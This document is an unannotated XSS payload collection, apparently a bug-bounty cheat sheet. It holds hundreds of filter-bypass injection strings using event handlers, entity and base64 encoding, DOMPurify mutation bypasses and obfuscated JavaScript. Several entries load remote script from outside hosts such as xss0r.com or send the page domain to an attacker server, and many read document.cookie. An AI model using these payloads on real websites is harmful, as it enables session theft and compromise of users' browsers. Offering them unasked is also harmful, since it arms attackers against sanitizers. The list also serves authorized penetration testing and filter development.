<brute+onbeforescriptexecute=a=alert,a(1%26%23x29>
<svg><script xlink:href="{ASCII}data:,alert(1)"></script></svg>
<marquee/onstart=c=String.fromCharCode;confirm(c(47)+c(88)+c(83)+c(83)+c(47))>
"><input type="submit"
formaction="javascript&colon;this&lsqb;'a'&plus;'lert'&rsqb;`1`"
<p style="height:100px" onwheel="self['al'+'ert'](self['ev'+'al']
('docu'+'ment.coo'+'kie'))"></p>
<video autoplay onplay=alert`1` src=//w3schools.com/tags/movie.mp4>
<input type=search onsearch="location='data:text/html;\x62\x61\x73\x65\x36\
x34,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='">
<input onf%0Aocus=alert(1) autofocus/
<meta/content="0;url=data:text/
html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<marquee loop=1 width=0 onfinish=prompt(1)>1</marquee>
?url="onm<>ouseover="ale<>rt(0)
"onm<>ouseover="ale<>rt(0)
<!<script>alert(document.domain)</script>
<!<script>confirm(1)</script>
<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme
eval('al'+'ert'+'(12)');//
<iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
<iframe src="java sc ript:al ert()"></iframe>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
<svg onload=prompt%26%23x000000028;document.domain)>
- xss"></a><input value="Type anything"onbeforeinput="prompt%26lpar
%3Bdocument.domain%26rpar%3B"><!--
><tag onxxxx=alert(1)>
><tag onxxxx="'a'|alert(1)">
'"><script src=https://xss0r.com/c/ibro1337></script>
"><img src=x
id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzMHIu
Y29tL2MvaWJybzEzMzciO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Og&#61;&#61;;
onerror=eval(atob(this.id))>
"><input onfocus=eval(atob(this.id))
id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzMHIu
Y29tL2MvaWJybzEzMzciO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Og&#61;&#61;;
autofocus>
"><iframe
srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#6
1;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;
&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#1
16;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#11
4;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#120;&#115;&#115;&#4
8;&#114;&#46;&#99;&#111;&#109;&#47;&#99;&#47;&#105;&#98;&#114;&#111;&#49;&#51;&#51;
&#55;&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109
;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#
100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#1
05;&#112;&#116;&#62;">
<script>$.getScript("//xss0r.com/c/ibro1337")</script>
'"></Title/</StYle/</TeXtarEa/</ScRipt/</NoScRiPt/</SeLeCt/</OpTiOn/</
Svg/''"><svg/
onload=javascript:eval(atob('dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS
5zcmM9Imh0dHBzOi8veHNzMHIuY29tL2MvaWJybzEzMzciO2RvY3VtZW50LmJvZHkuYXBwZW5kKGEpOw=='
))//
'"<img src="https://xss0r.com/c/ibro1337"
onerror='this.src="https://xss0r.com/c/ibro1337"'>
'"<iframe src='javascript:window.location="https://xss0r.com/c/ibro1337"'></iframe>
'"<iframe
srcdoc='<script>window.location="https://xss0r.com/c/ibro1337"</script>'></iframe>
--></tiTle></stYle></texTarea></scrIpt>"//'//><scrIpt
src="https://xss0r.com/c/ibro1337"></scrIpt>
<iframe name="<svg/onload=alert(23)>" src="http://example[.]com/x.php?
age=23;%0adocument.body.innerHTML=name//">
23;%0adocument.body.innerHTML=location.hash;//#<svg/onload=alert(23)>
<svg onload\r\n=$.globalEval("al"+"ert()");>
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<input/oninput='new Function`confir\u006d\`0\``'>
<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
<iframe/src='%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A:prompt`1`'>
XSS"%0D<body='X' onmouseover=setInterval`alert\
x28&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#111;&#111;&#107;&#105
;&#101;\x29`//
%22%3E%3Cd3v%2Fonauxclick%3D%5B2%5D.some%28confirm%29%3Eclick
"/*'/*`/*--><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
//comment%0a%0dalert(0);
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)
<!<script>alert(4)</script>
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\
u0074&lpar;this['document']['cookie']&rpar;">X</a>
<marquee loop=1 width=0 onfinish=alert`1`>XSS</marquee>
Tarun~<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-tarun/
&rpar;">XXXXX</a>
onload=\"a='alert()';d='XSS ';b='t(d)';c=a+b;console.log(eval(c));
constructor.constructor('alert(1)')()
javascript<TAB>:alert(1)
javascript://’//” →</textarea></style></script></title><b onclick=
alert()//>*/alert()/*
(javascript:this;alert(1))
(javascript:this;alert(1&#41;)
#constructor.constructor('alert(1)')()
';window['ale'+'rt'](window['doc'+'ument']['dom'+'ain']);//
';self['ale'+'rt'](self['doc'+'ument']['dom'+'ain']);//
';window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain']);//
';this['ale'+'rt'](this['doc'+'ument']['dom'+'ain']);//
';parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain']);//
';globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain']);//
';self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain']);//
';this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain']);//
';parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain']);//
';globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]
['domain']);//
';parent['\x65\x76\x61\x6c']('parent["\x61\x6c\x65\x72\x74"](parent["\x61\x74\x6f\
x62"]("WFNT"))');//
';frames['\x65\x76\x61\x6c']('frames["\x61\x6c\x65\x72\x74"](frames["\x61\x74\x6f\
x62"]("WFNT"))');//
';globalThis['\x65\x76\x61\x6c']('globalThis["\x61\x6c\x65\x72\x74"](globalThis["\
x61\x74\x6f\x62"]("WFNT"))');//
';this['\141\154\145\162\164']('\130\123\123');//
';top['\141\154\145\162\164']('\130\123\123');//
';frames['\141\154\145\162\164']('\130\123\123');//
';window['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
';parent['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
';self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\
x6d\x61\x69\x6e']);//
';window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])
[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
';self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])
[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
<img src=validimage.png onloadstart=alert(1)>
<svg/onload=eval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ==’))>
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(`VulneravelXSS`
%26%2300000000000000000041//
%3cscript%3ealert%281%29%3b%3c%2fscript%3e
%3Cinput+onfocus%3d%27/*=*/Function(%22ale%22%2b%22rt(document.domain)%22)();//
%27autofocus+
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>
/%2527)%253B%2520alert(document.cookies)%253B%252F%252F
al\u0065rt(1)
&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
“> <BODY ONLOAD=”a();”><SCRIPT>function a(){alert(‘X12SS’);}</SCRIPT><”
javascript:/*"/*'/*\"/*`/*><frame src=javascript:alert()></template </textarea
</title </style </noscript </noembed </script --><<script>alert()<</script>\
/**/alert()//
javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/
</noscript><<script/>/<frame */; onload=alert()//<</script>`
marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee>
<svg%09%0a%0b%0c%0d%a0%00%20onload=alert (1)>
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
<svg onload=alert("")>
$ <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? ------
<img src=1 onerror="a:b:c:d:alert(1)">
<svg onx=() onload=(confirm)(1)>
<img src onerror=confirm(1)>
&gt;+src+onerror=confirm&lpar;1&rpar;&lt;
<iframe src=data:text/html,<iframe
src="data:text/html;base64,PD8+PD8+TT9MSz9KSyNAJDpMQCNKXkBePHNjcmlwdD5hbGVydCgnQml0
QmFyZyA6KScpOzwvc2NyaXB0Pgo=">
<a href=javas%26#99;ript:prompt%26#x28document.domain)>xss
<script/%00%00v%00%00>document.location.href=location.hash.slice(1)</
script>#javascript:alert(document.cookie)
<script> http://window.name=`<img src=x onerror=alert(top.document.domain)>`
location=`https://domain/?xss=<iframe
src=javascript:src=http://top.name>x</iframe>` </script>
<svg/OnLoad="`${prompt``}`">
'-alert/*any*/(1)-'
%3Cx/Onpointerrawupdate=confirm%26lpar;)%3Exxxxx
%60%2balert/**/(1)%2b%60
tarun"><x/onafterscriptexecute=confirm%26lpar;)//
{{constructor.constructor('eval(atob(\'amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5jb29raWUp
\'))')()}}
<object/data=javascript:alert()>
<a/href="javascript%0A%0D:alert()">
-(a=alert,b="_Y000!_",[b].find(a))-'
-alert(1)-'
<marquee loop=1 onfinish=alert( )>x
Javascript://%E2%80%A9alert(618)
~2; "%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E"
for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’$
{M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|
0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
<svg onload='new Function`["_Y000!_"].find(al\u0065rt)`'>
<svg onload="[]['\146\151\154\164\145\162']['\
143\157\156\163\164\162\165\143\164\157\162'] ('\141\154\145\162\164\50\61\51')()">
<svg onload=&#97&#108&#101&#114&#116(1)>
vbscript:msgbox("XSS")
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
"><details/open/ontoggle=prompt("/test/")>
%3Cscript%3Efor((TESTXSS)in(self))eval(TESTXSS)(`${`TESTXSS`}`)%3C/script%3E
img{background-image:url('javascript:alert()')}
<body/onload=&lt;!--&gt;&#10alert(1)>
<IMG SRC=”javascript:alert(‘XSS’)”
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
<span/onmouseover=confirm(1)>xss
<a onmouseover%3D"alert(1)">xss
'?prompt`1`?'
"])},alert(1));(function xss() {//
"><SVG
ONLOAD=&#97&#108&#101&#114&#116(&#x64&#x6f&#x63&#x75&#x6d&#x65&#x6e&#x74&#x2e&#x64&
#x6f&#x6d&#x61&#x69&#x6e)>.asp
%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d
%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%7
8%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%
26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78
%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e
""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y
"}]}';alert(1);{{'
11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'1
\');confirm(1);//
x");$=alert, $(1);//
'|alert(1)|'
'*prompt(1)*'
#'*prompt(1)*'
"><details/open/ontoggle=confirm("/xss_by_Y000!/")>
setInterval('ale'+'rt(10)');
XSS"onfocus="prompt(document.cookie)"autofocus="
%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
%253cimg%20onerror=alert(1)%20src=a%253e
%3cimg onerror=alert(1) src=a%3e
javascript:x='%27-alert(1)-%27';
%3Cscript%3Ealert(1)%3C/script%3E##1
)alert(1);//
(alert)(1)
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
<sVg oNloaD=write()>
\xE2\x81\x9Fjavascript:javascript:confirm(1)
#{{constructor.constructor(alert`1`)()}}
<Img Src=On OnError=alert(1)>
<--`<img/src=` onerror=confirm``> --!>
<a href="javascript:pro\u006dpt(document.cookie)">L1k0r</a>
<!<script>alert(1)</script>
<svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
<a
href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t
&Tab;(document.domain)&rpar;">X</a>
</script><svg><script>alert(1)-%26apos%3B
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
javascript:%ef%bb%bfalert(XSS)
%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\
><plaintext/onmouseover=prompt(1)>
<--%253cimg%20onerror=alert(1)%20src=a%253e --!>
javascript:{ alert`0` }
<img src=x onError=import('//1152848220/')>
%2sscript%2ualert()%2s/script%2u
"><xss/contenteditable/autofocus/onfocus="alert(1)">%232%20XSS</xss>
<img/src/onerror=alert&#xFEFF;(1337)>
<img/src/onerror=&#8196;alert&#65279;(31337)>
<svg on onload=(alert)(document.domain)>
<img ignored=() src=x onerror=prompt(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<Rxss onscrollend=alert(origin) style="display:block;overflow:auto;border:1px
dashed;width:500px;height:100px;"><br>++</Rxss>
“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie
%26%2300000000000000000041;
"onx+%00+onpointerenter%3dalert(domain)+x"
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie
%26%2300000000000000000041;
<svg/onload=location/**/='https://your.server/'+document.domain>
<img/src=x onError="`${x}`;alert(`Ex.Mi`);">
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s]
(e+s+v+h+n)(/infected/.source)" />tap
%3C%5K/onpointerenter=alert(1)>
<P/onpointerenter=alert(1)>
'-[document.domain].map(alert)-'
<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>"
[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\
145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\15
3\75\42\51\51”)()
[]["filter"]["constructor"]("alert(1)")()
/%09/javascript:alert(1)
<!--*/!'*/!>%0D<svg/onload=confirm'1'//
1"><%3Csvg onload=alert%28document.cookie%29>'
/";%20confirm(1);%20//
%22%3e%3c%5K/onwheel=alert(1)%3eClick%20ME%3c%21--
%22})))}catch(e){alert(document.domain);}//
%22-confirm(1)-%22
//%250Aalert?.(1)//
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2fscript%3E
%3cscript%3ealert()%3c/script>
-alert(23)/
";a=prompt,a(1)//
"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
'-confirm(document.cookie)-'
data:text/html,<script>alert(0)</script>
foo<script>alert(document.cookie)</script>
#<iframe src=javascript:alert(1)>
"><img src=x onerror=alert(1);>
<--'<Script>Window.Confirm(2)</Script> --!>
&#x3c;img&#x2f;src&#x2f;onerror=alert('kalendra')&#x3e;
javascript:alert'1
javascript&#58;alert(1);
javascript&colon;alert(1);
/"><img src=y onerror=confirm(1)>
""><img src=y onerror=confirm(1)>
#""><img src=y onerror=confirm(1)>
<input onfocus="alert(0);" autofocus>
&lt;img src=# onerror=alert(1)&gt;
">><marquee><img src=x onerror=confirm(1)></marquee>"
onerror=alert(0);>
onerror=alert();><script>alert();</script>
&redirect?url=javascript://alert(document.cookie)
?url=javscript:alert(1)
<title>&lt/title&gt&ltimg&sol;src=&quot&quotonerror&equals;alert(1)&gt
< "a<noscript><p id="</noscript><img src=x onerror=alert(1)>"></p></noscript>
> DOMPurify.sanitize("a<noscript><p id='</noscript><img src=x
onerror=alert(1)>'></p></noscript>", {ADD_TAGS: ['noscript']});
<svg></p><style><g title="</style><img src onerror=alert(1)>">
<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;img src=1
onerror=alert(1)&gt;">
<math><mtext><a
title='one'><audio>aa<altglyphdef><animatecolor><filter><fieldset><a
title='two'></fieldset>ccd</a>gg<mglyph><svg><mtext><style><a title='</style><img
src=# onerror=alert(1)>'>
<xmp><svg><b><style><b title='</style><img src=x onerror=alert(1)>'>
<iframe><svg><b><style><b title='</style><img src=x onerror=alert(1)>'>
&redirect_url=javscript:alert(1)
&redirect_to=javascript:alert(document.domain)
%2500%27onmouseover=%27window.stop();alert(document.domain)%27
?path=%2500%27onmouseover=%27window.stop();alert(document.domain)%27
<ScRiPt>alert(1)</sCriPt>
<svg/onload=alert(1)>"@gmail.com
?__proto__[transport_url]=%3C%2fscript%3E%3Cscript%3Ealert(document.cookie)%3C
%2fscript%3Eivl0w
\u003e\u003cimg src=1 onerror=alert(0)\u003e
"/><svg/onload=prompt(1)>
test%22%7D%29%3B%7D%29%3Balert%281%29%3B%2f%2f
test123";(alert)("xss")//
{alert('document.cookie')}
jane('"><script>alert(2)</script>)@gmail.com
<!--><svg onload=alert(1)-->
#<!--><svg onload=alert(1)-->
#alert`1`
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
`${alert(1)}`
"oncut=alert(1)
"><img+src=x+onerror=alert(1)>
<scr\uffffipt>alert(0)</script>
&lt;img src=x onerror=alert(document.domain)&gt;
1337 '><marquee onstart="[cookie].find(confirm)">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";a
lert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
\><plaintext/onmouseover=prompt(1)
a=`\u003c`,b=`\u003e`,location=`javascript:[].findIndex(dump)+(/${a}img src=#
onerror=alert(1)${b}/.source)`
'-confirm(1)-
#'-confirm(1)-
"-confirm(1)-"
'-confirm(document.domain)-'
%22%3E%3Cimg%20src=x%20onerror=confirm%281%29;%3E
');confirm(1);//
<script>alert&DiacriticalGrave;1&DiacriticalGrave;</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<script src="data:,alert(1)">/</script>
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
x"><svg%250donload%3D"window%5B%27alert%27%5D(location[%27hostname%27])"
" formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src=""
setInterval`alert\x2823\x29`
window.name='javascript:alert\x2823\x29';
Reflect.set.call`${location}${'href'}${name}`
Reflect.apply.call`${alert}${undefined}${[23]}`
navigation.navigate`javascript:alert\x2823\x29`
var{haha:onerror=alert}=0;throw 1
'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}
onerror=eval;throw'=alert\x2823\x29';
{onerror=alert}throw 23
throw{},onerror??=alert,"XSS"??123
http://example.com/?%0aalert(23)
window.name='javascript:alert(23)';
throw onerror=eval,SyntaxError`alert\x2823\x29`
x='javascript:alert\x2823\x29';x={x:location}=this
window.name="<img src=x onerror=alert(23)>"
<JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/
AutoFocus/OnFocus=location=tagName>
document.body.innerHTML="\u003cimg src=x onerror=alert\u002823\u0029\u003e";
document.body.innerHTML="&ltimg src=x onerror=alert&lpar;23&rpar;&gt"
document.body.innerHTML=document.body.innerText
document.location='javascript:alert%2823%29'
<svg/onload='alert&#40 23 &#41'>
onerror=eval;throw'alert\x2845\x29';
prompt`45`
([,하,,,,훌]=[]+{},[한,글,페,이,,로,드,ㅋ,,,ㅎ]=[!!하]+!하+하.ㅁ)[훌+=하+ㅎ+ㅋ+한+글+페+훌+한+하+글][훌](로+드+
이+글+한+'(45)')()
[45].some.alert()
Set.constructor`alert\x2845\x29`
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
" onload="document.cookie" foobar="
location='javaScriPt:alert\x2845\x29'
'javaScriPt:alert\x2845\x29'
location=/javascript:alert%2823%29/.source;
&lt;img/src=&quot;x&quot;/onerror=alert(23)&gt;
location='JaVaScRiPt:prompt'+document.location.hash[1]+'45'+document.location.hash[
2]
'JaVaScRiPt:prompt'+document.location.hash[1]+'45'+document.location.hash[2]
window.name="alert(23)";
'1/-alert\5023\51/';
throw/**/Uncaught=window.onerror=eval,&quot;;alert\5023\51&quot;
%3Csvg%20onload=alert(1)%3E
%3Cimg%20src=x%20onerror=alert(1)%3E
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/Yetixx%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--
%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fYetixx%2f%29%3C%21--
[].sort.call`${alert}23`
throw onerror=eval,SyntaxError`alert\x2823\x29`
<object src=1 href=1 onerror="javascript:alert(1)"></object>
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset
onScroll>
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee
onStart>
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html
onMouseMove>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
%22%3E%3Cli%20style=list-style:url()%20onerror=javascript:alert(1)%3E%20%3Cdiv
%20sty
&ltscr\x00ipt&gtalert('Steiner254')&lt/scr\x00ipt&gt
&ltScRiPt&gtalert('Steiner254');&lt/ScRiPt&gt
<iframe/onload=alert(0);>
#<iframe/onload=alert(0);>
setTimeout('ale'+'rt(2)');
top['alert'](3)
'te' / alert('/') / 'xt';
></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B
%26%23116%3B(document.domain)>
'-alert(0)-'
',document.location='javascript:document.domain','
blalala');alert(1);('a
#blalala');alert(1);('a
eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))”> <iframe
"><script>alert(“hello”)</script>jnyf0
<IMG SRC=javascript:alert('XSS')>
<img/src/onerror=alert(1)
<body ontouchmove=alert(1)>
<body ontouchend=alert(1)>
<IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)>
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
java%09script:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript://%0Aalert(1)
javascript://anything%0D%0A%0D%0Awindow.alert(1)
<iframe srcdoc="<img src=x onerror=alert(998282828181100019)>"></iframe> /path?
next=javascript:top[/al/.source+/ert/.source](document.cookie) login?
redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
<<SCRIPT>alert("test");//<</SCRIPT>
<SCRIPT SRC=https://xss.rocks/xss.js?< B >
<BODY ONLOAD=alert('XSS')>
<TABLE BACKGROUND="javascript:alert('XSS')">
444-555-4455 <img src=x onerror=alert(1)>
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
<img/src="x"/onerror="[boom]">
%3cscript%3ealert(1)%3c/script>
"}]}';</script><script>alert('You got XSSed')</script>
</script><script>alert('You got XSSed')</script>
#</script><script>alert('You got XSSed')</script>
"}]}';alert('You got XSSed')</script>
test“autofocus onclick=’&#97;lert()’
<img src="data:image/svg+xml,<svg onload='top[//.source+//ert//.source]
(document.cookie)'">
<iframe
srcdoc="<script>top[//.source+//ert//.source](document.cookie)</script>"></iframe>
<a href="/*">*/)});function+__MobileAppList(){alert(1)}//>
"><BODy
onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\
u006d('+'document'+'.'+x1+c">
xss\"\u003E\u003Ch1 onmous\u0045leave=co\u006efirm(domain)\u003ECome to
Me\u003C/h1\u003E\u003Cbr\u003E\u003C!--
<s<script>cript>alert()</s<script>cript>
alert`23`
window.name="javascript:alert(23)";
eval.call`${'alert\x2823\x29'}`
eval.apply`${[`alert\x2823\x29`]}`
setTimeout`alert\x2823\x29`
onerror=alert;throw 23;
param A=<script>alert("
#*/confirm(1)
javascript:%61lert(1)
“`’><script>\x0Djavascript:alert(document.cookie)</script>
x"><x a="><script>alert(1)</script>
<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>
(A(%22onerror=%22alert%601%60%22))
<fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074/AAAA/>
onfocus=alert&#x00000000028;1&#x00000000029; autofocus>
'><img+sRc=l+oNerrOr=prompt(document.cookie)+x>
“ OnMouseOver=”prompt`1`
"oncut="alert()
<script>window['al'+'ert']()</script>
<script>top[`alert`]()</script>
<img src=x onerror="js:abc='al'+'ert()';eval(abc)" />
<script>window[['conf','irm'].toString().replaceAll(',',"")]()</script>
%26#x6c;t;\\x73cript&#62;\\u0061lert(1)%26#x6c;t;/\\x73cript&#62;
‘onfocus=’alert(1)’
<img%20src=x%20onerror=”%26%2397%26%23108%26%23101%26%23114%26%23116(1)”>
"><div class=progress><div onwebkitanimationstart=prompt(document.domain)>
/on<script>load=prompt(document.cookie);>
quot;">"onmousemove=alert('flag{THIS_IS_THE_FLAG}');"@evil.com</a>
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
“javascript:var{a:onerror}={a:alert};throw%20document.cookie”
?msg=<img/src=`%00`%20onerror=this.onerror=confirm(1)
<img/src=`%00`%20onerror=this.onerror=confirm(1)
<svg><script%20?>confirm(1)
qwe"srcdoc="\u003ce<script%26Tab;src=//dom.xss>\u003ce</script%26Tab;e>
';window/*aabb*/['al'%2b'ert'](document./*aabb*/location);//
<img src=x onerror="a='',b=!a+a,aa=!b+a,ab=a+{},ba=b[a++],bb=b[baa=a],bab=+
+baa+a,aaa=ab[baa+bab],b[aaa+=ab[a]+(b.aa+ab)[a]+aa[bab]+ba+bb+b[baa]+aaa+ba+ab[a]
+bb][aaa](aa[a]+aa[baa]+b[bab]+bb+ba+'(a)')()">
anything&callback=%22;alert%60XSS_POC_BY_SAAJAN_BHUJEL%60;%2f%2f
anything&callback=";alert`XSS_POC_BY_SAAJAN_BHUJEL`;//
<%<script>alert(1)</script>
" onload=alert&#0000000040origin) value="
javascript%3Avar%7Ba%3Aonerror%7D%3D%7Ba%3Aalert%7D%3Bthrow%2520document.cookie
"><img src="x" onerror=alert(1337) />
<script>alert()</script>”/></style>
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])]
(document[%27cooki%27%2B(['e','c','z'][0])]);%22
/*alert(1)*/
alert(1)
\”}})})-confirm`1`;(function(){({if(){/*///
\”}})})-confirm`1`(a=>{({b:{/*///
<bgsound src="javascript:alert('XSS');">
<isindex action="javascript:alert('XSS')">
<command onclick="alert('XSS')">Command</command>
<fieldset form="javascript:alert('XSS')">
